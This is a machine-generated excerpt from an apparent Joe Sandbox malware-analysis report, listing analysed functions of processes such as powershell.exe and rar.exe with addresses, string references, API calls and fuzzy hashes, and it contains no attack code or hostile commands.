
Strings

out of memory, xrefs: 00007FFD94112508
string or blob too big, xrefs: 00007FFD94112193

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010
String ID: out of memory$string or blob too big
API String ID: 4157932375-2410398255
Opcode ID: 3637a19043f084d588f66de9b4ccfa5c358998dffeaae2edb35b3df82807b365
Instruction ID: 4a0bbb679dd1cf032c8266873901447680ca3dab0d5eab3a58921155c0614f58
Opcode Fuzzy Hash: 3637a19043f084d588f66de9b4ccfa5c358998dffeaae2edb35b3df82807b365
Instruction Fuzzy Hash: 8C61D467B0869282E7249B66E1A027E6760FF47B98F108036EF4D27B96DF3CE451D710

Function 00007FFD94140660 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

00007FFDAC063010.VCRUNTIME140 ref: 00007FFD94140802
00007FFDAC063010.VCRUNTIME140 ref: 00007FFD9414081B

Strings

string or blob too big, xrefs: 00007FFD9414092D

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010
String ID: string or blob too big
API String ID: 4157932375-2803948771
Opcode ID: c8ac0a323bf9438d58d6516081a8c5b2cacbd73607acdce0e600ae5c24db9ecb
Instruction ID: 179785cd089447793bd40426a5bfbfc74f723e34cbfab18a79a79108c1f0b237
Opcode Fuzzy Hash: c8ac0a323bf9438d58d6516081a8c5b2cacbd73607acdce0e600ae5c24db9ecb
Instruction Fuzzy Hash: AF919F22F0920285FA749B96D5B43792BA0AF82B98F048139DE4D273EBDE3DE445C741

Function 00007FFD9416D710 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

00007FFDAC063010.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFD9416D9BA,?,?,?,00007FFD9416DD7B), ref: 00007FFD9416D927

Strings

INS, xrefs: 00007FFD9416D889
CRE, xrefs: 00007FFD9416D86F

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010
String ID: CRE$INS
API String ID: 4157932375-4116259516
Opcode ID: f8dadf2cc8f17a0e3781b67facb98dc0a138e0cbf34f1f32e46277c3bbf8e1db
Instruction ID: 95be23fd940b68017cb4b6e84851d79179fa8fb5b95cf024540ec1f57fe86eef
Opcode Fuzzy Hash: f8dadf2cc8f17a0e3781b67facb98dc0a138e0cbf34f1f32e46277c3bbf8e1db
Instruction Fuzzy Hash: 3C51CD22B1964281FA349BA694B43796395BF82FE4F58C135DE4D6B797DE3DE802C300

Function 00007FFDA3348B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00007FFDA33483B4), ref: 00007FFDA3348B36
SystemTimeToFileTime.KERNEL32(?,00007FFDA33483B4), ref: 00007FFDA3348B46

Strings

gfff, xrefs: 00007FFDA3348B7A

Memory Dump Source

Source File: 00000002.00000002.2536395323.00007FFDA3341000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDA3340000, based on PE: true

Associated: 00000002.00000002.2536355851.00007FFDA3340000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA3403000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536743912.00007FFDA3407000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffda3340000_mcgen.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
Instruction ID: 9f7f44be553ef275d6ef4ecc9e9e081b9fc8b2ee8f80a626d7bf211d5d564aa5
Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
Instruction Fuzzy Hash: 0801DBE2B19E4542DF54EB25F8111556791F7CC785B849032E74DCB766EE2DD2018740

Analysis Process: powershell.exePID: 4072, Parent PID: 3196COMMON

Executed Functions

Function 00007FFD32CFB518 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f59dfd4702aa8ab6fb52f9bfb88281c181fd1ae4d0f4db837cb2ce877425eef9
Instruction ID: 264307717e447c92dff831563db4c7251d45c979ab296cccabab2749e8faf435
Opcode Fuzzy Hash: f59dfd4702aa8ab6fb52f9bfb88281c181fd1ae4d0f4db837cb2ce877425eef9
Instruction Fuzzy Hash: 6B816B31A1CA884FE759DF28C8956FABBE1EF56312F1401BEC08AC7193DA65A806C751

Function 00007FFD32CFB663 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ac4b47d1b3268db6eae05107117e6e161380a630cb86b889e5472b685a2fb65
Instruction ID: 5e6076539584b4a96713ff76ba095473e975b4b3c1dca375d45a8d78fe121530
Opcode Fuzzy Hash: 7ac4b47d1b3268db6eae05107117e6e161380a630cb86b889e5472b685a2fb65
Instruction Fuzzy Hash: BD517A32A0CB884FEB58DF2C98955BA7BE1EF9A321F04017EE1C9C3193DA65A407C741

Function 00007FFD32DC4253 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2317154166.00007FFD32DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44e186424ece89eecb9dd0198bde3aac57796451adcb7cf1e353cc124896c947
Instruction ID: 13fab4ad85cd4f02210733333e7a4a119960f59f5e992c10d501b3f773c13398
Opcode Fuzzy Hash: 44e186424ece89eecb9dd0198bde3aac57796451adcb7cf1e353cc124896c947
Instruction Fuzzy Hash: C8516722F4DA5A4FEBA9CA1C642127477D1EFC5222B4801BBD28FC7197DE18EC018391

Function 00007FFD32CF98A8 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fb14c11497187f149dd5fff71552f3fbf5590c8677dbe3d3855cd69c01dc863
Instruction ID: eff86a1a9b9e3a6b2d8daca734e31f44763b8f967cb8597ae1f9b882c6389b66
Opcode Fuzzy Hash: 8fb14c11497187f149dd5fff71552f3fbf5590c8677dbe3d3855cd69c01dc863
Instruction Fuzzy Hash: 50318F31A1CB4C9FDB18DB5CA8466A9BBE0FB99721F00422FE449D3251DA71B855CBC2

Function 00007FFD32DC429F Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2317154166.00007FFD32DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b28bb1120d967f15468d59a7fe05baa165879ea19e8f6a8b2c50e1fa64127483
Instruction ID: 7b03408cc2c1c61be3acc87573b9fdcb172541afde302580d336860f3732315c
Opcode Fuzzy Hash: b28bb1120d967f15468d59a7fe05baa165879ea19e8f6a8b2c50e1fa64127483
Instruction Fuzzy Hash: FA214823F4EA674FF7A9C71C7461174A6C1EF84222B4800BAD28FC71A2CE58EC009390

Function 00007FFD32DC6A0E Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2317154166.00007FFD32DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64da73961df2ae5698d46e358be530118d5279eef9c2d6a6a458a77d542ec173
Instruction ID: 57b5e8aa9121d8d6791afa9adad8d7d0f1b3321df6d4617d6bdd4b5010cdc3ed
Opcode Fuzzy Hash: 64da73961df2ae5698d46e358be530118d5279eef9c2d6a6a458a77d542ec173
Instruction Fuzzy Hash: F0115932F0D6894FEB55DB9850641787BE1EF89301B1440FFC04DC7183D965A885C3A0

Function 00007FFD32BDE6AA Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2311100582.00007FFD32BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32bdd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e3156267c1cb7f851df26c493c048c3beed913f440915df7083bd3c27bf145a
Instruction ID: c1920cdc0996b5502f8cf4352bbcb89a9eedf44a468e74fa576099a4335416e7
Opcode Fuzzy Hash: 1e3156267c1cb7f851df26c493c048c3beed913f440915df7083bd3c27bf145a
Instruction Fuzzy Hash: 7701A232A0DE088F9658EF2DE085D9577E1FB9432171005AED149CB666DA71F886CB82

Function 00007FFD32CF33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
Instruction ID: aa51fb53255f554423446ce1cf97bebfc4b08df82c8e877e04e9a6909c02cefe
Opcode Fuzzy Hash: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
Instruction Fuzzy Hash: 0B01A73120CB0C4FDB48EF0CE091AA6B3E0FB85364F10052DE58AC3651DA32E882CB41

Function 00007FFD32BDE6BF Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2311100582.00007FFD32BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32bdd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56f4bddb564cff3ae0eaed41149a3ffe2d2b29172fa5166b543b54159a42f63
Instruction ID: a43a7a43211d375914338b5fef1c1e8acff13e50b78167d93bcee0651ca178e5
Opcode Fuzzy Hash: d56f4bddb564cff3ae0eaed41149a3ffe2d2b29172fa5166b543b54159a42f63
Instruction Fuzzy Hash: D5F0DA34A19E089F8B94EF2DC489D1237F1FB983147510A58E45EC7669D774F891CB81

Function 00007FFD32DC45E0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2317154166.00007FFD32DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f0c04ca68d680442cda4c22ee38c6c3fd16713cf55834f1be9eb0837457bb4
Instruction ID: 2fbba81f7a14c728a7023cd9d6ac7a4fb5feec48f4bb40e83de33307fb1f91e1
Opcode Fuzzy Hash: 99f0c04ca68d680442cda4c22ee38c6c3fd16713cf55834f1be9eb0837457bb4
Instruction Fuzzy Hash: B1F08232B4D5548FEB54EB4CE4514E977E0EF0932271500F6E15EC7563CA69EC44C790

Function 00007FFD32CFA3C8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8021c4b5bbd8798d50225dd126ea68db524b69ec5a3aeda473a5cb2a4650e85
Instruction ID: 54c601969b4000a35b78f933e79a876f5c3d8ed02f84f32f6230eefd609bb534
Opcode Fuzzy Hash: a8021c4b5bbd8798d50225dd126ea68db524b69ec5a3aeda473a5cb2a4650e85
Instruction Fuzzy Hash: 05E01A35944A4C8F8B44EF28D8595E97BE0FB69211B05029BE85DC7121EB719958CBC2

Non-executed Functions

Function 00007FFD32CF86FA Relevance: 6.3, Strings: 5, Instructions: 94COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD32CF86FA
N_^, xrefs: 00007FFD32CF8712
N_^, xrefs: 00007FFD32CF87C2
N_^, xrefs: 00007FFD32CF8772
N_^, xrefs: 00007FFD32CF8722

Memory Dump Source

Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^$N_^
API String ID: 0-1162251571
Opcode ID: c9fbb01b56b2e9ce0d5be8d0b4163ac6566ed784f1cca7f2086d9a1525bb6bcd
Instruction ID: dd2fa22c95f3a0503e2a9bd59bb1a9e3b616040388cdd3be0b3614231fdbc24c
Opcode Fuzzy Hash: c9fbb01b56b2e9ce0d5be8d0b4163ac6566ed784f1cca7f2086d9a1525bb6bcd
Instruction Fuzzy Hash: E731D667F0EAC65FE35602786CB91D93FD0AF11229B0E01F3DAC88B093FD5818169702

Function 00007FFD32CF8955 Relevance: 5.2, Strings: 4, Instructions: 150COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD32CF8A7A
N_^, xrefs: 00007FFD32CF8AC2
N_^, xrefs: 00007FFD32CF89C9
N_^, xrefs: 00007FFD32CF8A2A

Memory Dump Source

Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: 28452c23105a236aea7841fbe8f9eb5a12d080a4b1de6fa634820144a9efb6f5
Instruction ID: 185c9181ba13584447b0d83c394f03932214002072a675a98e459b6c6cfef77b
Opcode Fuzzy Hash: 28452c23105a236aea7841fbe8f9eb5a12d080a4b1de6fa634820144a9efb6f5
Instruction Fuzzy Hash: 254175A7F0EAC26FE35646385CB91997F60FF12319B0D02F6C6C48B093E95A1916D712

Function 00007FFD32CF8BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

N_^I, xrefs: 00007FFD32CF8C72
N_^F, xrefs: 00007FFD32CF8C6A
N_^<, xrefs: 00007FFD32CF8C2A
N_^J, xrefs: 00007FFD32CF8C7A
N_^6, xrefs: 00007FFD32CF8BFA

Memory Dump Source

Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd

Similarity

API ID:
String ID: N_^6$N_^<$N_^F$N_^I$N_^J
API String ID: 0-4116931533
Opcode ID: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
Instruction ID: 40453df06017949b544df67dfa46c484536e3dccd3c64e9dc3e268ce1e87c2e9
Opcode Fuzzy Hash: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
Instruction Fuzzy Hash: 3521FE67B084265FE31677EDBC205D86780DFA43B674802B3D35CDB603D964609B87C9

Analysis Process: powershell.exePID: 7524, Parent PID: 7272COMMON

Executed Functions

Function 00007FFD32DD1A5E Relevance: .4, Instructions: 432COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003E.00000002.2401573407.00007FFD32DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_7ffd32dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f86802104ad8e1f09de69ca34b5c58a1f65c62fb72b0dd594b853d09b8e95623
Instruction ID: f13d5716663724937274a299b6160038e3bda6ebd5a742465eb7e7064c9d4d55
Opcode Fuzzy Hash: f86802104ad8e1f09de69ca34b5c58a1f65c62fb72b0dd594b853d09b8e95623
Instruction Fuzzy Hash: 03C14B22F0EF890FE7A69B2C68601B57BD1EF46611B0941FBD08DC7593E958EC06D3A1

Function 00007FFD32D04DD3 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003E.00000002.2400868446.00007FFD32D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_7ffd32d00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ecbccc1d13eb72a4d301814813b57fc3cc799f17e58eafce89b9ccb0568a1f
Instruction ID: 7e3bfae79926c864b5c86e04681f7bfd5155687ef72ad6d94aa16ce763b7525e
Opcode Fuzzy Hash: a3ecbccc1d13eb72a4d301814813b57fc3cc799f17e58eafce89b9ccb0568a1f
Instruction Fuzzy Hash: 3561E571F09A4D4FDB45EB6CD8556ACBBF1FF4A321F1481AED049D7292CA35A802CB90

Function 00007FFD32DD1863 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003E.00000002.2401573407.00007FFD32DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_7ffd32dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5d0079ecdf05faadc7e0695cd77ee3923b85480c73d0cfd9a3074bdc6b1b370
Instruction ID: 4f291c9459b8050dfbcff369339987afee6651ed47e5464b6c888c0d932319e6
Opcode Fuzzy Hash: d5d0079ecdf05faadc7e0695cd77ee3923b85480c73d0cfd9a3074bdc6b1b370
Instruction Fuzzy Hash: C2412923F4DE4A0FF7999A5C74612B973D2EF88622B4400BFD24EC3593EE59E81192D1

Function 00007FFD32DD1A73 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003E.00000002.2401573407.00007FFD32DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_7ffd32dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0c29b96dd4d358214351f8deeeed6acd2a540ad3a0c5678622be89be5976399
Instruction ID: cd3e17b75199e3c16089c06f208ddbdfee0df8299b4f820f8a6616a8046e93a7
Opcode Fuzzy Hash: d0c29b96dd4d358214351f8deeeed6acd2a540ad3a0c5678622be89be5976399
Instruction Fuzzy Hash: 7741F822F0EF890FE7B5866C64641B47BE1EF46612B4E00FAD54DC7493E958AC0593A1

Function 00007FFD32D03945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003E.00000002.2400868446.00007FFD32D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_62_2_7ffd32d00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 9aaa6248837e045aaa52870d910bf912ed292abd3f003da0d31d5d6b9124f8ca
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 4E01A73120CB0C4FDB48EF0CE051AA6B3E0FB85324F10052DE58AC3661D632E881CB41

Analysis Process: rar.exePID: 2300, Parent PID: 7060COMMON

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	1191
Total number of Limit Nodes:	38

Executed Functions

Function 00007FF695CE54C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON

Download Yara Rule

Strings

ERR, xrefs: 00007FF695CE5D40
VER, xrefs: 00007FF695CE5EBA
SND, xrefs: 00007FF695CE5D11
default.sfx, xrefs: 00007FF695CE60F4
OFF, xrefs: 00007FF695CE5E4B
+, xrefs: 00007FF695CE6535
stdin, xrefs: 00007FF695CE6236
NUL, xrefs: 00007FF695CE5DB3
LOG, xrefs: 00007FF695CE5CD0
7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx, xrefs: 00007FF695CE5935
*?., xrefs: 00007FF695CE598C
*.%ls, xrefs: 00007FF695CE59AF
EML, xrefs: 00007FF695CE5D6B
rar.log, xrefs: 00007FF695CE5CE5
stdin, xrefs: 00007FF695CE672D
SFX, xrefs: 00007FF695CE60CC

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID:
String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
API String ID: 0-1628410872
Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction ID: 78d6b66303eab75ad7583c88b0169c56b6ad288190d7098fe5d1b545b1b00b6d
Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction Fuzzy Hash: 30C2BF63D1C182C1EA749B24A1471BD26F1EB01F94F5881B9EA4ACB2C5DFADBD8CC354

Function 00007FF695CD1884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON

Download Yara Rule

Strings

BK, xrefs: 00007FF695CD19C5
sfx, xrefs: 00007FF695CD1884
q:, xrefs: 00007FF695CD19DA
exe, xrefs: 00007FF695CD1897
rar, xrefs: 00007FF695CD18AA
%s%s , xrefs: 00007FF695CD2A46
,6, xrefs: 00007FF695CD2F83
.ext, xrefs: 00007FF695CD18C0

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID:
String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
API String ID: 0-1660254149
Opcode ID: 1193c66867ffe3842d3fab37fbdef0c8ab0e0f25f8e32a752ddbcdc47c50b0ea
Instruction ID: fc08128b26357f783fa3d838ee7723fd9cc5c80b711c12878c689a4edb92c45b
Opcode Fuzzy Hash: 1193c66867ffe3842d3fab37fbdef0c8ab0e0f25f8e32a752ddbcdc47c50b0ea
Instruction Fuzzy Hash: 83E27A27A09AC2C9EB30DB25D8402FD27F1FB85B88F4541BADA4D8B696DF39D945C300

Function 00007FF695D148CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

